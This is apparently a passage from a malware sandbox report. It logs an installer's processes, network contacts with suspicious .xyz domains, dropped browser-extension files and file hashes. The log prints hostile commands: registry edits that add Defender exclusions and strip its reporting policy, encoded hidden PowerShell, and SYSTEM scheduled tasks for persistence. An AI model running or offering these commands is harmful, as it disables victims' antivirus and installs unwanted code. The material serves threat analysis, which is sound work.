\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "geqrlYoLs" /SC once /ST 07:03:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "geqrlYoLs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "geqrlYoLs"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 05:15:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\WNgxMz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\pKVBzLj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 00:14:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 r10.o.lencr.org udp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 addons.mozilla.org udp
US 151.101.65.91:80 addons.mozilla.org tcp
US 151.101.65.91:443 addons.mozilla.org tcp
US 8.8.8.8:53 91.65.101.151.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 151.101.65.91:80 addons.mozilla.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 api4.check-data.xyz udp
US 35.162.118.53:80 api4.check-data.xyz tcp
US 8.8.8.8:53 53.118.162.35.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe

MD5 3b76af9e2510171d3739b8bc9ee2ee68
SHA1 4c8148a587ba7e6de8963c2d4dbbcceac39b3694
SHA256 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768
SHA512 d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe

MD5 ad10a30760d467dade24f430b558b465
SHA1 7aaa56e80264c27d080c3b77055294593eacca1b
SHA256 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a
SHA512 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

memory/1620-13-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/3172-17-0x0000027079D00000-0x0000027079D22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcq14fbq.ugh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1148-33-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/2028-35-0x0000000003EA0000-0x0000000003ED6000-memory.dmp

memory/2028-36-0x00000000045D0000-0x0000000004BF8000-memory.dmp

memory/2028-37-0x0000000004C00000-0x0000000004C22000-memory.dmp

memory/2028-38-0x0000000004CE0000-0x0000000004D46000-memory.dmp

memory/2028-44-0x0000000004E00000-0x0000000004E66000-memory.dmp

memory/2028-49-0x00000000050A0000-0x00000000053F4000-memory.dmp

memory/2028-50-0x0000000005460000-0x000000000547E000-memory.dmp

memory/2028-51-0x00000000054B0000-0x00000000054FC000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c1834583f870c6afc6780e6354eace4a
SHA1 34b1016f92a60787b2502e18b5e9ce0c9b5a1e00
SHA256 2c28d41cb82bb55fafaa17e9ccb70a315028478c632103c28615822a98a4b80c
SHA512 a1c2681b1deb96fc3416e35fe0b959b3e8befbef82f80f782ec0d074ee6786b93b8563be0fbabbf983e9b33d0ee5584896af0f61de0339e0a6e9d558dadeadef

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/3252-98-0x0000000003D40000-0x0000000003DC5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 2393845e99ffd3c7af749b7d7f150010
SHA1 71f915826a0a2e25c5849bc869389a95ada40867
SHA256 417a30f924cee5a7400abd91bf3e450317a76b04f333ba47174fbdf713af0edd
SHA512 ae336616b45c75bc78806ff95c95485b2a0bce6c7e1b04985092e7aeb2d3adf6d546bb32de1af67ab596038ae2249331a77e31ccb1339b4a4340dd33bd31d2a2

memory/3252-144-0x0000000004500000-0x000000000456B000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 10379cf6c154cf03d8d7e4ff25288e3d
SHA1 eff5c4511e9e22760a332700bd3dc4cf824b07c5
SHA256 85cfddbb1317c3ad1cb93a862763b15be729841081aa8e6bc5a0e2e39325e98c
SHA512 f8c424a0121d564c5def9cbcbbdc9f2582be73e7181964bc40d96c57e0f9adb7316ae65d3baecaae36129266026133c5fc1629182b031b6f6cfefe1d65947b47

C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml

MD5 3729cf440240e5651448465e4a5ee5b1
SHA1 9fe90c1f9cb98beca1e528f10350b09a1d18cd97
SHA256 e6c7232f7f94fb07b1bc7f4f8b35d2ce812cf6b482744409fe4d3edb0e47d3a7
SHA512 3b8fd569613efb57ee6c53d7e03d254d979730f91ca92fb8388c3c640e2ec3537fd772c119e0c70fbd9a9d86c662ab4725dcc5fc6093876e3c8cf672397f448d

C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml

MD5 285afe329a58bd74b17fd3abaebbfc9f
SHA1 7d630d333e36ffe9935d7df9d34b558783964bcd
SHA256 0d942f45f9782faa2dedc72b114bbd33187d91563d86894df9a5cf7b9ce8e119
SHA512 39358742de691dc2c200ecfc5cbb6066a815dff8afcf6ee5cad056ba1dbfd83983588d6cc4923b36325c40036e3b977ea5b301940f707cad15c55ebb7f65d440

C:\ProgramData\eiYaNjTCbhfbMeVB\pKVBzLj.xml

MD5 dc1d9db021f503f6a7d51465cf5d1605
SHA1 a8a658feb696a11c7809e411cb9e3c485285cb5a
SHA256 9e74d17ebd78eaa2ec7cab23a5ec057f85ed1a072ae8a7a9d4e224361bb9ec78
SHA512 471835d6932a486d82d5ad5f1d35f7faa3afa7515923e502add39927da42f647a36ec4942e9e0d2798553533e19c3cf6649492565287251e0a8852a47e36ff92

C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml

MD5 bf23352b70c2c8635aec6774ab5c8d5e
SHA1 ef8a0cac3c0b24516e28371630499a7cc823addf
SHA256 9067890693621d2cdb1b208e7220c29704c6304b63bef00251cb3530687d163c
SHA512 b3398222c9802e621667725d3b170ab65ed2fcc8bc5c43b24da89ac087b04453c479d0b7e77f5fdd43380972ec5ff17b0bf7c5973ee075a92d5893d3cb21e799

C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml

MD5 ad253ba04775950f6e1e753962ba3e20
SHA1 32f1d4da60ce18371d6ca2d643ae3b8c0357d4c8
SHA256 329306ac902603235beaf115692932604f888fc81bc5eef77dffb64881879cda
SHA512 1d5d8821d941910f2e594c28bea5f78e3b1e0d8f4ea56430a7d195701bcd38fffdd540cd730ec99919ea9deb13a8607844bff5dd04257be3e386aa6c2eed8cdb

C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll

MD5 617698f01c7cceb3b262a98ba4da5a98
SHA1 c9244abc65ab3c485cc197ddea5e846b65d14bad
SHA256 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754
SHA512 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

memory/3252-323-0x0000000004E10000-0x0000000004ECD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs.js

MD5 861505b9c18f179453a2793067151fa3
SHA1 e8d11463d0e7ca1c636de2cee5350f00d6b55786
SHA256 7e233126e1242e11d0b463c5625ec9fa0e8eee7fea80ea605aeeeaf944ff43d4
SHA512 a3e8a9c5548cfdbba211965dbf8553a88a8001c34e9bd7d2b33ef28a0a1357f0483297965fae1ad34bb3a71822a23bc7e3743443a890791cfca925dad961f4a3

memory/3252-313-0x0000000004D90000-0x0000000004E03000-memory.dmp

memory/2028-346-0x0000000001BB0000-0x0000000002AB4000-memory.dmp